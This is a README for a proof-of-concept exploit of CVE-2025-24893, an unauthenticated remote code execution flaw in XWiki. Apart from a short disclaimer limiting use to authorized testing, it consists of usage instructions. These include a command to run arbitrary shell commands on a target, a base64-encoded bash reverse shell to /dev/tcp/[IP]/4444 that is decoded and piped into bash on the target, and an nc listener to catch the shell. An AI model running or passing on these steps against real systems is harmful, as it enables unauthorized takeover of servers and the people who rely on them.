# CVE-2025-24893 - XWiki Remote Code Execution (RCE)
An updated proof-of-concept (PoC) exploit for **CVE-2025-24893**, a critical unauthenticated RCE vulnerability in [XWiki](https://xwiki.org/). This version improves on the original by allowing arbitrary shell command execution and clean reverse shell injection.
> By: [HexHunter404](https://github.com/dhiaZnaidi)
---
## ⚠️ Warning
This code is provided for **educational and authorized penetration testing purposes only**.
**Do not use it on systems you do not own or have explicit permission to test.**
---
## ✨ Features
- Supports command execution via `bash -c '<command>'`
- Fully supports reverse shells (via base64 to bypass Groovy issues)
- Improved handling of command output
- Preserves `/xwiki` path and avoids redirect loops
---
## 🐍 Usage
```
python3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
```
---
## 🐚 Getting a Reverse Shell
. Base64-encode your reverse shell
```
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
```
. Send it using the PoC
```
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
```
. Set up your listener
```
nc -lvnp 4444
```
If successful, you'll catch a shell
[4.0K] /data/pocs/68f8fd823edf482505dd95ad644380b2b276f49e
├── [2.2K] CVE-2025-24893-PoC.py
└── [1.2K] README.md
0 directories, 2 files